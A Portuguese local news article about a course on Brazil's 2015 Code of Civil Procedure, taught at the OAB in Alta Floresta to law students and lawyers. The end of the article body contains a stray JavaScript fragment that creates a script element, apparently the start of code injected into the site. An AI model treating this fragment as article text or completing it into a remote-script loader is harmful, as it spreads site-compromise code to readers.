Capa / Educação / Assessor jurídico ministra curso do novo CPC na OAB em Alta Floresta

Assessor jurídico ministra curso do novo CPC na OAB em Alta Floresta

essa-oabDa Redação / Eduardo Henrique

O assessor jurídico de juiz de direito, Pedro Mendes está promovendo o curso do novo Código de Processo Civil (CPC). O curso está sendo ministrado aos sábados das 13 horas ás 17 horas no auditório da Ordem dos Advogados do Brasil (OAB).

Durante quatro semanas, cerca de 30 acadêmicos de direito da faculdade participam do curso, que tem o objetivo de discutir as principais alterações e novidades. O curso teve início no dia 30 de setembro.

Além dos acadêmicos, participa também o presidente da OAB Celso Reis e advogados que buscam a atualização com as mudanças do Código Processual Civil de 2015, que agora visa mais a conciliação das partes como regra antes de adentrar para a justiça.

No entendimento do jurista, o juiz agora tem a obrigação de pedir para as partes que entrou na justiça uma conciliação antes de iniciar o processo, logo, o Estado na maioria das vezes perde certo tempo com processos, que uma conversa entre as partes resolveria e acabaria com os gastos a mais com honorários de advogados e o tempo percorrido, logo se não for aceito pelo autor do processo a conciliação o processo terá início na justiça. Além de gastos com energia e anos transitando até que a solução seja posta.var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top